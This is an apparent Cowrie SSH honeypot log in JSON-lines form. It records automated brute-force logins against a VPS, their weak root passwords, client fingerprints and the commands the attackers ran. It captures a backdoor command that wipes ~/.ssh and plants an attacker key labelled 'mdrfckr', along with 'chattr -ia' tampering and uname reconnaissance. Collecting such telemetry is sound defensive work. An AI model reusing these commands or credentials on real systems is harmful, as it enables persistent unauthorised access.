{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:25:38.817161Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:25:39.079028Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:39.079908Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":53020,"dst_ip":"1.2.3.4","dst_port":22,"session":"bed38150fd2f","protocol":"ssh","message":"New connection: 27.112.78.245:53020 (1.2.3.4:22) [session: bed38150fd2f]","sensor":"my-vps","timestamp":"2025-08-26T00:25:39.347762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:25:39.348906Z","src_ip":"27.112.78.245","session":"bed38150fd2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:25:39.617073Z","src_ip":"27.112.78.245","session":"bed38150fd2f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:25:40.728467Z","src_ip":"27.112.78.245","session":"bed38150fd2f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:41.999162Z","src_ip":"27.112.78.245","session":"bed38150fd2f"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.245","src_port":53034,"dst_ip":"1.2.3.4","dst_port":22,"session":"53b018e2bde3","protocol":"ssh","message":"New connection: 27.112.78.245:53034 (1.2.3.4:22) [session: 53b018e2bde3]","sensor":"my-vps","timestamp":"2025-08-26T00:25:42.269187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:25:42.269967Z","src_ip":"27.112.78.245","session":"53b018e2bde3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:25:42.543200Z","src_ip":"27.112.78.245","session":"53b018e2bde3"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:25:43.667245Z","src_ip":"27.112.78.245","session":"53b018e2bde3"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:43.936560Z","src_ip":"27.112.78.245","session":"25632a8a9919"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:25:43.938053Z","src_ip":"27.112.78.245","session":"53b018e2bde3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42722,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c1a1f2e94f3","protocol":"ssh","message":"New connection: 212.227.235.229:42722 (1.2.3.4:22) [session: 5c1a1f2e94f3]","sensor":"my-vps","timestamp":"2025-08-26T00:26:05.521417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:26:05.522351Z","src_ip":"212.227.235.229","session":"5c1a1f2e94f3"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T00:26:05.729281Z","src_ip":"212.227.235.229","session":"5c1a1f2e94f3"}
{"eventid":"cowrie.login.success","username":"root","password":"password123","message":"login attempt [root/password123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:26:06.557243Z","src_ip":"212.227.235.229","session":"5c1a1f2e94f3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:26:07.023852Z","src_ip":"212.227.235.229","session":"5c1a1f2e94f3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T00:26:07.024599Z","src_ip":"212.227.235.229","session":"5c1a1f2e94f3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:07.234118Z","src_ip":"212.227.235.229","session":"5c1a1f2e94f3"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:07.235236Z","src_ip":"212.227.235.229","session":"5c1a1f2e94f3"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":50788,"dst_ip":"1.2.3.4","dst_port":22,"session":"0df7742df656","protocol":"ssh","message":"New connection: 45.159.112.103:50788 (1.2.3.4:22) [session: 0df7742df656]","sensor":"my-vps","timestamp":"2025-08-26T00:26:15.438145Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:26:15.439272Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:26:15.553749Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.login.success","username":"root","password":"System@123","message":"login attempt [root/System@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:26:16.051813Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:26:16.344462Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:26:16.345247Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:26:16.345976Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:16.461383Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:26:16.710472Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:26:16.711205Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:26:16.827707Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:16.828605Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":50792,"dst_ip":"1.2.3.4","dst_port":22,"session":"ebea1200d94b","protocol":"ssh","message":"New connection: 45.159.112.103:50792 (1.2.3.4:22) [session: ebea1200d94b]","sensor":"my-vps","timestamp":"2025-08-26T00:26:16.925620Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:26:16.926311Z","src_ip":"45.159.112.103","session":"ebea1200d94b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:26:17.029904Z","src_ip":"45.159.112.103","session":"ebea1200d94b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:26:17.484474Z","src_ip":"45.159.112.103","session":"ebea1200d94b"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:18.590730Z","src_ip":"45.159.112.103","session":"ebea1200d94b"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":50798,"dst_ip":"1.2.3.4","dst_port":22,"session":"858d38a0cc73","protocol":"ssh","message":"New connection: 45.159.112.103:50798 (1.2.3.4:22) [session: 858d38a0cc73]","sensor":"my-vps","timestamp":"2025-08-26T00:26:18.702987Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:26:18.704125Z","src_ip":"45.159.112.103","session":"858d38a0cc73"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:26:18.812331Z","src_ip":"45.159.112.103","session":"858d38a0cc73"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:26:19.287237Z","src_ip":"45.159.112.103","session":"858d38a0cc73"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:19.397162Z","src_ip":"45.159.112.103","session":"0df7742df656"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:19.398090Z","src_ip":"45.159.112.103","session":"858d38a0cc73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50888,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b7d6cc0c3ba","protocol":"ssh","message":"New connection: 212.227.235.229:50888 (1.2.3.4:22) [session: 5b7d6cc0c3ba]","sensor":"my-vps","timestamp":"2025-08-26T00:26:21.352538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:26:22.096621Z","src_ip":"212.227.235.229","session":"5b7d6cc0c3ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T00:26:22.097312Z","src_ip":"212.227.235.229","session":"5b7d6cc0c3ba"}
{"eventid":"cowrie.login.success","username":"root","password":"Jaival@123","message":"login attempt [root/Jaival@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:26:25.481696Z","src_ip":"212.227.235.229","session":"5b7d6cc0c3ba"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:25.962336Z","src_ip":"212.227.235.229","session":"5b7d6cc0c3ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50182,"dst_ip":"1.2.3.4","dst_port":22,"session":"ad2c620c9351","protocol":"ssh","message":"New connection: 212.227.235.229:50182 (1.2.3.4:22) [session: ad2c620c9351]","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.324822Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.413912Z","src_ip":"212.227.235.229","session":"ad2c620c9351"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50336,"dst_ip":"1.2.3.4","dst_port":22,"session":"94ecc0ad38b0","protocol":"ssh","message":"New connection: 212.227.235.229:50336 (1.2.3.4:22) [session: 94ecc0ad38b0]","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.502684Z"}
